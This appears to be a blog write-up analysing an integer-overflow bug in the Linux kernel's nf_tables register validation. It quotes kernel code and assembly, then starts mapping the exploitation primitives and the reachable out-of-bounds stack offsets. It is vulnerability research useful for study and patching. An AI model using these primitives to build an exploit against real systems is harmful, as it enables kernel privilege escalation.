  <p>A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.</p>
</blockquote>

<p>I will again recommend reading my article providing an introduction to <em>nf_tables</em> as it provides a good base to be able to understand the vulnerability.</p>

<h3 id="root-cause-">Root cause <a name="rootcause"></a></h3>
<p>The root cause of the vulnerability is in the functions <code class="language-plaintext highlighter-rouge">nft_validate_register_store</code> and <code class="language-plaintext highlighter-rouge">nft_validate_register_load</code>. They validate that the register index and the data to be written (stored) or read (loaded) stay within the bounds of the registers.
However, before we take a look at them we will first take a look at the <strong>parsing</strong> functions - <code class="language-plaintext highlighter-rouge">nft_parse_register_store</code> and <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code> which call the two validating functions.</p>

<h4 id="parser-functions-">Parser functions <a name="parserfunc"></a></h4>
<p>The parsing functions are responsible for <em>parsing</em> values from netlink attributes to register indexes and calling the validation functions.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="kt">int</span> <span class="nf">nft_parse_register_load</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u8</span> <span class="o">*</span><span class="n">sreg</span><span class="p">,</span> <span class="n">u32</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">u32</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// 4 byte register variable</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

	<span class="n">reg</span> <span class="o">=</span> <span class="n">nft_parse_register</span><span class="p">(</span><span class="n">attr</span><span class="p">);</span> <span class="c1">// gets the register index from an attribute</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">nft_validate_register_load</span><span class="p">(</span><span class="n">reg</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span> <span class="c1">// calls the validating function</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// a negative value means validation failed, so the error is returned</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

	<span class="o">*</span><span class="n">sreg</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// save the register index into sreg (a pointer that is provided as an argument)</span>
	<span class="c1">// sreg = source register -&gt; the register from which we read</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL_GPL</span><span class="p">(</span><span class="n">nft_parse_register_load</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">nft_parse_register_store</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u8</span> <span class="o">*</span><span class="n">dreg</span><span class="p">,</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_data</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span>
			     <span class="k">enum</span> <span class="n">nft_data_types</span> <span class="n">type</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// 4 byte register variable</span>

	<span class="n">reg</span> <span class="o">=</span> <span class="n">nft_parse_register</span><span class="p">(</span><span class="n">attr</span><span class="p">);</span> <span class="c1">// parsed from an attribute</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">nft_validate_register_store</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">type</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
	<span class="cm">/* here we pass a bit more arguments to the validating function */</span>
	<span class="cm">/* because we are going to be writing into the registers and not reading from them */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

	<span class="o">*</span><span class="n">dreg</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// once again saves the register index into dreg</span>
	<span class="c1">// dreg = destination register -&gt; the register in which we write</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In the code above the <code class="language-plaintext highlighter-rouge">reg</code> variable is a <code class="language-plaintext highlighter-rouge">u32</code> (a 32-bit integer), while the <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">dreg</code> pointers point to <code class="language-plaintext highlighter-rouge">u8</code> variables, which are 8-bit. This of course makes sense if you know how the registers work. The total register space is <code class="language-plaintext highlighter-rouge">0x50 = 80</code> bytes. So there is no reason to save more than the least significant byte after validation - if the register index is in-bounds it should always fit in those 8 bits.</p>
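<p>To see what "saving only the least significant byte" means in practice, here is a tiny userspace sketch of that final assignment. <code class="language-plaintext highlighter-rouge">store_reg</code> is a hypothetical name, and the sketch deliberately contains no validation; it only shows what the conversion from 32 bits to 8 bits does to a value.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/*
 * Mirrors the "*sreg = reg" / "*dreg = reg" step of the parser functions:
 * a 32-bit value is stored into an 8-bit variable, so only the lowest
 * byte survives. The kernel relies on the implicit conversion; the cast
 * here gives the same result.
 */
void store_reg(uint32_t reg, uint8_t *out)
{
	*out = (uint8_t)reg;
}
</code></pre></div></div>
<p>A value such as <code class="language-plaintext highlighter-rouge">0x17</code> is stored unchanged, while anything above <code class="language-plaintext highlighter-rouge">0xff</code> loses its upper bits (<code class="language-plaintext highlighter-rouge">0x104</code> becomes <code class="language-plaintext highlighter-rouge">0x04</code>). That is harmless as long as the validation only lets in-bounds indexes through.</p>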

<h4 id="register-translation-">Register translation <a name="regtranslation"></a></h4>
<p>Now before we go into detail on the validation functions let’s first look at the register offsets and the enum type that we have. This section can be skipped if you have a really good understanding of how register offsets are handled and translated in netfilter. However, I recommend reading it as it will be important later on.</p>

<p>So if you have read my article on <code class="language-plaintext highlighter-rouge">nf_tables</code> you should know that there are two types of register offsets for the data section of the registers. There used to be only four 16-byte registers. Then those registers turned into sixteen 4-byte ones. However, for compatibility reasons, the 16-byte register offsets also stayed. So the registers can be viewed as a single buffer with two types of offsets.</p>

<p><img src="https://i.imgur.com/93aKEAi.png" alt="regs_schematic.png" /></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_registers</span> <span class="p">{</span>
	<span class="n">NFT_REG_VERDICT</span><span class="p">,</span>
	<span class="n">NFT_REG_1</span><span class="p">,</span>
	<span class="n">NFT_REG_2</span><span class="p">,</span>
	<span class="n">NFT_REG_3</span><span class="p">,</span>
	<span class="n">NFT_REG_4</span><span class="p">,</span>
	<span class="n">__NFT_REG_MAX</span><span class="p">,</span>

	<span class="n">NFT_REG32_00</span>	<span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
	<span class="n">NFT_REG32_01</span><span class="p">,</span>
	<span class="n">NFT_REG32_02</span><span class="p">,</span>
	<span class="p">...</span>
	<span class="n">NFT_REG32_13</span><span class="p">,</span>
	<span class="n">NFT_REG32_14</span><span class="p">,</span>
	<span class="n">NFT_REG32_15</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Taking a look at the enum type we can see how both types of offsets exist in it. <code class="language-plaintext highlighter-rouge">NFT_REG_VERDICT</code> points to zero and <code class="language-plaintext highlighter-rouge">NFT_REG_1</code> to <code class="language-plaintext highlighter-rouge">NFT_REG_4</code> point to indexes from one to four.
We see how <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> is defined as eight so <code class="language-plaintext highlighter-rouge">NFT_REG32_01</code> is nine and so on and so forth.</p>

<p>So now what happens is a translation in the <code class="language-plaintext highlighter-rouge">nft_parse_register</code> function.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="cm">/**
 *	nft_parse_register - parse a register value from a netlink attribute
 *
 *	@attr: netlink attribute
 *
 *	Parse and translate a register value from a netlink attribute.
 *	Registers used to be 128 bit wide, these register numbers will be
 *	mapped to the corresponding 32 bit register numbers.
 */</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">nft_parse_register</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">reg</span><span class="p">;</span>

	<span class="c1">// from include/uapi/linux/netfilter/nf_tables.h</span>
	<span class="c1">// NFT_REG_SIZE = 16 (16 bytes)</span>
	<span class="c1">// NFT_REG32_SIZE = 4 (4 bytes)</span>
	<span class="n">reg</span> <span class="o">=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">nla_get_be32</span><span class="p">(</span><span class="n">attr</span><span class="p">));</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NFT_REG_VERDICT</span><span class="p">...</span><span class="n">NFT_REG_4</span><span class="p">:</span>
		<span class="k">return</span> <span class="n">reg</span> <span class="o">*</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span><span class="p">;</span> 
	<span class="nl">default:</span>
		<span class="k">return</span> <span class="n">reg</span> <span class="o">+</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span> <span class="o">-</span> <span class="n">NFT_REG32_00</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If the register that is parsed through a netlink attribute is between the values <code class="language-plaintext highlighter-rouge">NFT_REG_VERDICT...NFT_REG_4</code> (between the values zero and four) it does a calculation which returns the register index as <code class="language-plaintext highlighter-rouge">reg * 16 / 4</code>  or <code class="language-plaintext highlighter-rouge">reg * 4</code>.</p>

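<p>So it just scales up the register index by a factor of 4 if the old registers were used. That makes sense as the old registers were 16-byte ones and the new ones are 4-byte ones. <code class="language-plaintext highlighter-rouge">NFT_REG_1</code> translates to index 4, the same slot as <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code>, and <code class="language-plaintext highlighter-rouge">NFT_REG_2</code> translates to index 8, the same slot as <code class="language-plaintext highlighter-rouge">NFT_REG32_04</code>. So <code class="language-plaintext highlighter-rouge">NFT_REG_2</code> spans <code class="language-plaintext highlighter-rouge">NFT_REG32_04</code> through <code class="language-plaintext highlighter-rouge">NFT_REG32_07</code> (not <code class="language-plaintext highlighter-rouge">NFT_REG32_08</code>, as the 4-byte register offsets start from <code class="language-plaintext highlighter-rouge">00</code>).</p>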

<p>This is when the old register offsets are used. However when the new register offsets are used - the 4-byte ones - another calculation is performed. That calculation is meant to align the number from the enum to the actual register index - because in the enum type the 4-byte register offsets are themselves offset by eight - <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> maps to 8.</p>

<p>So the calculation yields that the true register index is <code class="language-plaintext highlighter-rouge">reg + 16 / 4 - 8</code> which is <code class="language-plaintext highlighter-rouge">reg - 4</code>.</p>

<p>So the true register index of <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> is actually <code class="language-plaintext highlighter-rouge">8-4 = 4</code>. Why four you might ask? Well, there is a verdict register that sits at the beginning of the registers which is 16 bytes wide and that is the size of four 4-byte registers so the first data register starts actually from four and not zero.</p>

<p>Extremely confusing, I know - but this is what we deal with. Now we can take a look at the validation functions.</p>

<h4 id="validation-functions-">Validation functions <a name="validationfunc"></a></h4>
<p>We will take a look at only one of them as the vulnerability is the same in both.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="kt">int</span> <span class="nf">nft_validate_register_load</span><span class="p">(</span><span class="k">enum</span> <span class="n">nft_registers</span> <span class="n">reg</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span> <span class="o">&lt;</span> <span class="n">NFT_REG_1</span> <span class="o">*</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span><span class="p">)</span>
		<span class="cm">/* NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE is 1 * 16 / 4 = 4 */</span>
		<span class="cm">/* this check is essentially reg &lt; 4 */</span>
		<span class="cm">/* this essentially checks if you are reading the verdict */</span>
		<span class="cm">/* the verdict is located at reg offsets 0 to 3 */</span>
		<span class="cm">/* if attempting to load the verdict it returns an EINVAL */</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// if trying to read with len = 0, return EINVAL - makes sense</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span> <span class="o">*</span> <span class="n">NFT_REG32_SIZE</span> <span class="o">+</span> <span class="n">len</span> <span class="o">&gt;</span> <span class="n">sizeof_field</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_regs</span><span class="p">,</span> <span class="n">data</span><span class="p">))</span>
		<span class="cm">/* NFT_REG32_SIZE = 4 */</span>
		<span class="cm">/* sizeof_field(struct nft_regs, data) gets the size of the registers */</span>
		<span class="cm">/* the size of the registers in total is 0x50 = 80 */</span>
		<span class="cm">/* reg * 4 + len &gt; 0x50 */</span> 
		<span class="cm">/* This rule is to make sure we are not loading and storing */</span>
		<span class="cm">/* outside of the registers */</span>
		<span class="cm">/* going outside of the registers would be dangerous as */</span>
		<span class="cm">/* the registers are on the stack so reading or writing outside of them */</span>
		<span class="cm">/* would be a direct out-of-bounds access on the stack in **kernel-space** */</span>
		<span class="cm">/* if going OOB it returns an ERANGE error */</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ERANGE</span><span class="p">;</span>
	
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>You might have spotted the vulnerability in the last if-statement.</p>

<p><code class="language-plaintext highlighter-rouge">if (reg * NFT_REG32_SIZE + len &gt; sizeof_field(struct nft_regs, data))</code></p>

<p>The constant <code class="language-plaintext highlighter-rouge">NFT_REG32_SIZE</code> is 4. If we pass a big enough value for <code class="language-plaintext highlighter-rouge">reg</code>, multiplying it by 4 and adding <code class="language-plaintext highlighter-rouge">len</code> overflows the 32-bit integer and the sum wraps around to a small number. That allows very high values of <code class="language-plaintext highlighter-rouge">reg</code> to pass the check when they normally wouldn’t.</p>

<p>Let us look at an example. If we <strong>assume</strong> <code class="language-plaintext highlighter-rouge">reg</code> to be a 32-bit integer, as it is in <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code>, then the maximum value we could pass for <code class="language-plaintext highlighter-rouge">reg</code> is <code class="language-plaintext highlighter-rouge">0xffffffff</code>, four bytes of <code class="language-plaintext highlighter-rouge">0xff</code>. Multiplying such a value by four gives <code class="language-plaintext highlighter-rouge">0x3FFFFFFFC</code>, which is more than four bytes. In this case only the lower four bytes, <code class="language-plaintext highlighter-rouge">0xfffffffc</code>, are carried into the next computation.</p>

<p>Let’s say we have a value of <code class="language-plaintext highlighter-rouge">len = 0x20</code>. Then at the end of the computation in the if-statement our value would be <code class="language-plaintext highlighter-rouge">0xfffffffc + 0x20 = 0x10000001C</code>. Again that value is more than four bytes, so only the lower four are kept, which leaves the total at <code class="language-plaintext highlighter-rouge">0x1c</code>. Since <code class="language-plaintext highlighter-rouge">0x1c</code> is not greater than <code class="language-plaintext highlighter-rouge">0x50</code>, no error is returned, and the register value we pass (<code class="language-plaintext highlighter-rouge">0xffffffff</code>) is accepted as a <em>valid</em> one even though it is not.</p>

<p>If you remember, <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code> and <code class="language-plaintext highlighter-rouge">nft_parse_register_store</code> save only the least significant byte into <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">dreg</code> (because both are of type u8). That means that in the end <code class="language-plaintext highlighter-rouge">sreg</code> or <code class="language-plaintext highlighter-rouge">dreg</code> would be just <code class="language-plaintext highlighter-rouge">0xff</code>. That index is still far outside <code class="language-plaintext highlighter-rouge">nft_regs</code>, which is only <code class="language-plaintext highlighter-rouge">0x50</code> bytes (twenty 4-byte slots).</p>

<p>That would mean that we could potentially read and write out of the bounds of <code class="language-plaintext highlighter-rouge">nft_regs</code> directly on the stack.</p>

<p>Even though I just used <code class="language-plaintext highlighter-rouge">0xffffffff</code> as an example value that at the end evaluates at <code class="language-plaintext highlighter-rouge">0xff</code> - the highest value that could reach the validation function is <code class="language-plaintext highlighter-rouge">0xfffffffb</code> due to how the registers are parsed. We took a look at that already but let’s go over it again.</p>

<p>In the enum type, the verdict and the 16-byte registers hold the values 0 to 4. Everything higher than that is treated as a 4-byte register, and when those are evaluated 4 is subtracted from them to align them correctly. You might want to go back to that section to re-read it if something is unclear.</p>

<p>That means that if we pass <code class="language-plaintext highlighter-rouge">0xffffffff</code> it would be decreased by 4 before it even reaches the validation function so reg by that point would be equal to <code class="language-plaintext highlighter-rouge">0xfffffffb</code>. As only the lowest byte of that would be taken for the actual register value - the register we will have is <code class="language-plaintext highlighter-rouge">0xfb</code>. That is true for all register values that we pass higher than <code class="language-plaintext highlighter-rouge">4</code>. This would mean that the highest register index we can get is <code class="language-plaintext highlighter-rouge">0xfb</code>.</p>

<p>However, there is a way to reach the register values from <code class="language-plaintext highlighter-rouge">0xfc</code> to <code class="language-plaintext highlighter-rouge">0xff</code>. Until now we used the base <code class="language-plaintext highlighter-rouge">0xffffffXX</code> for the register values we pass but we could also use <code class="language-plaintext highlighter-rouge">0x3fffffXX</code> and <code class="language-plaintext highlighter-rouge">0x7fffffXX</code>. If we use a lower base - for example, <code class="language-plaintext highlighter-rouge">0x3fffffXX</code> - we could pass a value like <code class="language-plaintext highlighter-rouge">0x40000003</code> that when decreased by 4 will be equal to <code class="language-plaintext highlighter-rouge">0x3fffffff</code>. When the least-significant byte is taken it evaluates to register index <code class="language-plaintext highlighter-rouge">0xff</code>. That’s how we reach the highest register indexes.</p>

<blockquote>
  <p>In all future mentions of register indexes -&gt; the register index refers to the REAL index (after they are decreased by 4).</p>
</blockquote>

<h4 id="a-big-but-">A big “but” <a name="bigbut"></a></h4>
<p>But all of that is under the assumption that the register that reaches the validation function is indeed 32 bits wide. And that might not be true. The parameter of the function is of type <code class="language-plaintext highlighter-rouge">enum nft_registers</code>. By default, an enum is wide enough to hold integer values (32 bits). However, an optimization might be active that makes an enum only as big as needed to hold the values provided in its definition. If that optimization is active, our <code class="language-plaintext highlighter-rouge">enum nft_registers</code> would be the size of a char (1 byte). In that case, only the least-significant byte would reach the faulty validation, complicating things.</p>

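<p>There is no information showing whether that optimization is active by default in the kernel.
So the only way to tell is to look at the assembly of the validation function, which the compiler inlined into <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code>. Let’s do that.</p>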
<pre><code class="language-assembly">; nft_parse_register_load - kernel built from source at tag 5.12
0xffffffff81a6c870 &lt;+0&gt;:	call   0xffffffff81065160 &lt;__fentry__&gt;
0xffffffff81a6c875 &lt;+5&gt;:	mov    eax,DWORD PTR [rdi+0x4]
0xffffffff81a6c878 &lt;+8&gt;:	bswap  eax
0xffffffff81a6c87a &lt;+10&gt;:	mov    edi,eax
0xffffffff81a6c87c &lt;+12&gt;:	lea    ecx,[rax-0x4]
0xffffffff81a6c87f &lt;+15&gt;:	shl    edi,0x4
0xffffffff81a6c882 &lt;+18&gt;:	shr    edi,0x2
0xffffffff81a6c885 &lt;+21&gt;:	cmp    eax,0x4
0xffffffff81a6c888 &lt;+24&gt;:	mov    eax,edi
0xffffffff81a6c88a &lt;+26&gt;:	cmova  eax,ecx
0xffffffff81a6c88d &lt;+29&gt;:	test   edx,edx
0xffffffff81a6c88f &lt;+31&gt;:	je     0xffffffff81a6c8a3 &lt;nft_parse_register_load+51&gt;
0xffffffff81a6c891 &lt;+33&gt;:	cmp    eax,0x3
0xffffffff81a6c894 &lt;+36&gt;:	jbe    0xffffffff81a6c8a3 &lt;nft_parse_register_load+51&gt;
0xffffffff81a6c896 &lt;+38&gt;:	lea    edx,[rdx+rax*4]
0xffffffff81a6c899 &lt;+41&gt;:	cmp    edx,0x50
0xffffffff81a6c89c &lt;+44&gt;:	ja     0xffffffff81a6c8a9 &lt;nft_parse_register_load+57&gt;
0xffffffff81a6c89e &lt;+46&gt;:	mov    BYTE PTR [rsi],al
0xffffffff81a6c8a0 &lt;+48&gt;:	xor    eax,eax
0xffffffff81a6c8a2 &lt;+50&gt;:	ret    
0xffffffff81a6c8a3 &lt;+51&gt;:	mov    eax,0xffffffea
0xffffffff81a6c8a8 &lt;+56&gt;:	ret    
0xffffffff81a6c8a9 &lt;+57&gt;:	mov    eax,0xffffffde
0xffffffff81a6c8ae &lt;+62&gt;:	ret    
</code></pre>
<p>If we take a look at <code class="language-plaintext highlighter-rouge">&lt;+38&gt;</code> and the few instructions below we can see that this is the generated assembly of the vulnerable if-statement.</p>

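<p>We can see that in my case the nft register index is in <code class="language-plaintext highlighter-rouge">rax</code> and <code class="language-plaintext highlighter-rouge">len</code> is in <code class="language-plaintext highlighter-rouge">rdx</code>. The <code class="language-plaintext highlighter-rouge">lea</code> computes <code class="language-plaintext highlighter-rouge">rdx + rax*4</code> and saves the result into the lower 32 bits (<code class="language-plaintext highlighter-rouge">edx</code>). Then <code class="language-plaintext highlighter-rouge">edx</code> is compared to <code class="language-plaintext highlighter-rouge">0x50</code>. The index is handled as a full 32-bit value (<code class="language-plaintext highlighter-rouge">eax</code>) and is only cut down to a byte at <code class="language-plaintext highlighter-rouge">&lt;+46&gt;</code>, after the check. This clearly shows that the register size in the function is not shrunk by <code class="language-plaintext highlighter-rouge">enum</code> optimization.</p>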

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>Now that it is clear that no optimization is in our way we can take a look at how we could potentially exploit this.</p>

<p>In order to be able to exploit this we would need to be able to create and modify <code class="language-plaintext highlighter-rouge">nf_tables</code> objects - tables, chains, etc. To do that we need the capability <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. Thankfully we can obtain it in a user+network namespace. We will just have to make sure to leave the namespace during exploitation.</p>

<p>This vulnerability is essentially an incorrect validation. It allows us to set register values such that we access addresses on the stack outside of <code class="language-plaintext highlighter-rouge">nft_regs</code>. That gives us an Out-Of-Bounds Read and Write, which can lead to Arbitrary Code Execution in kernel-space.</p>

<h3 id="primitives-">Primitives? <a name="primitives"></a></h3>
<p>It is time to look into what our primitives are. All the expressions use the registers in some way - either by reading from them or writing to them. Now the question is about looking for the ones most useful to help us exploit this vulnerability.</p>

<h4 id="nft_immediate_expr-">nft_immediate_expr <a name="imm"></a></h4>
<p>This one writes constant data to the registers. So in theory it could be used for an OOB write.</p>

<p>However, with this expression we can only write up to 16 bytes, which is not ideal, and that 16-byte limit also severely restricts the register values we can pass.</p>

<p>The minimal register value that still passes the validation is <code class="language-plaintext highlighter-rouge">0xfffffffc</code>, which is <strong>very</strong> restrictive.</p>

<h4 id="nft_payload-">nft_payload <a name="payload"></a></h4>
<p>The <code class="language-plaintext highlighter-rouge">nft_payload</code> expression is used to copy directly from the packet to the registers. Because the destination register is the one under our control, this is a perfect expression for an OOB write. We can copy up to <code class="language-plaintext highlighter-rouge">0xff</code> bytes at once, which is the most we can get from any expression. Let’s find out our lower and upper bounds.</p>

<p>Our lower bound is reached when we <em>max out</em> our len at <code class="language-plaintext highlighter-rouge">0xff</code>. The minimal register value that still passes the validation condition is then <code class="language-plaintext highlighter-rouge">0xffffffc1</code>. That means the lowest offset we can access is <code class="language-plaintext highlighter-rouge">0xc1 * 4 = 0x304</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code> on the stack.</p>

<p>Our upper bound is reached when our register value is the highest possible, <code class="language-plaintext highlighter-rouge">0xff</code>. At that register value, the highest length we could have is <code class="language-plaintext highlighter-rouge">0x54</code>, at which <code class="language-plaintext highlighter-rouge">0x3fffffff * 4 + 0x54</code> wraps around to <code class="language-plaintext highlighter-rouge">0x50 &lt;= 0x50</code>. This means that the highest offset we can access is <code class="language-plaintext highlighter-rouge">0xff * 4 + 0x54 = 0x450</code>.</p>

<p>So the lowest offset we can access is <code class="language-plaintext highlighter-rouge">0x304</code> and the highest is <code class="language-plaintext highlighter-rouge">0x450</code>. That leaves us with a window of <code class="language-plaintext highlighter-rouge">0x14c = 332</code> bytes on the stack.</p>

<h4 id="nft_payload_set-">nft_payload_set <a name="payloadset"></a></h4>
<p>The <code class="language-plaintext highlighter-rouge">nft_payload_set</code> expression does the opposite of <code class="language-plaintext highlighter-rouge">nft_payload</code>. Instead of copying from the packet to the registers, it copies from the registers and writes onto the packet, which is what we need for an OOB read. It has the same bounds as <code class="language-plaintext highlighter-rouge">nft_payload</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_payload_set</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_type</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The difference is that it takes a source register <code class="language-plaintext highlighter-rouge">sreg</code> instead of a destination register <code class="language-plaintext highlighter-rouge">dreg</code>. It also has some checksum options but they are not relevant to us.</p>

<h4 id="nft_bitwise-">nft_bitwise <a name="bitwise"></a></h4>
<p>This expression is used to perform <em>bitwise</em> operations on the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_bitwise</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_bitwise_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">mask</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">xor</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It takes a <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code>, which specify the registers the bitwise operation is performed on. The destination <code class="language-plaintext highlighter-rouge">dreg</code> specifies where the result of the operation is stored.</p>

<p>The <code class="language-plaintext highlighter-rouge">op</code> parameter of type <code class="language-plaintext highlighter-rouge">nft_bitwise_ops</code> specifies the type of bitwise operation. You can read all about the types in my article on <code class="language-plaintext highlighter-rouge">nf_tables</code> but here we will review only the one that concerns us.</p>

<p>We will be using this expression to copy from register to register without performing <em>any</em> bitwise operation. We are going to use it in case we need to copy some data from out-of-bounds ‘registers’ to the actual registers. To do this we are going to set <code class="language-plaintext highlighter-rouge">op</code> to either <code class="language-plaintext highlighter-rouge">NFT_BITWISE_LSHIFT</code> or <code class="language-plaintext highlighter-rouge">NFT_BITWISE_RSHIFT</code> and pass a zero as the data (here the data is the number of bits we shift by).</p>

<p>What are our bounds when we use this expression?</p>

<p>Here the boundaries are a bit different. Our max length cannot be <code class="language-plaintext highlighter-rouge">0xff</code> because if it is then both our <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">dreg</code> would be out-of-bounds which we don’t want. So our length must be <code class="language-plaintext highlighter-rouge">0x40 = 64</code> at the maximum (16 data registers each 4 bytes).</p>

<p>Our lower bound would then be when we barely cross the threshold of validity with the maximum len we could have, <code class="language-plaintext highlighter-rouge">0x40</code>. This means that our lower bound is at register value <code class="language-plaintext highlighter-rouge">0xfffffff0</code>, because <code class="language-plaintext highlighter-rouge">0xfffffff0 * 4 + 0x40</code> wraps around to <code class="language-plaintext highlighter-rouge">0x00 &lt; 0x50</code>. Converted to a byte offset that is <code class="language-plaintext highlighter-rouge">0xf0 * 4 = 0x3c0</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>.</p>

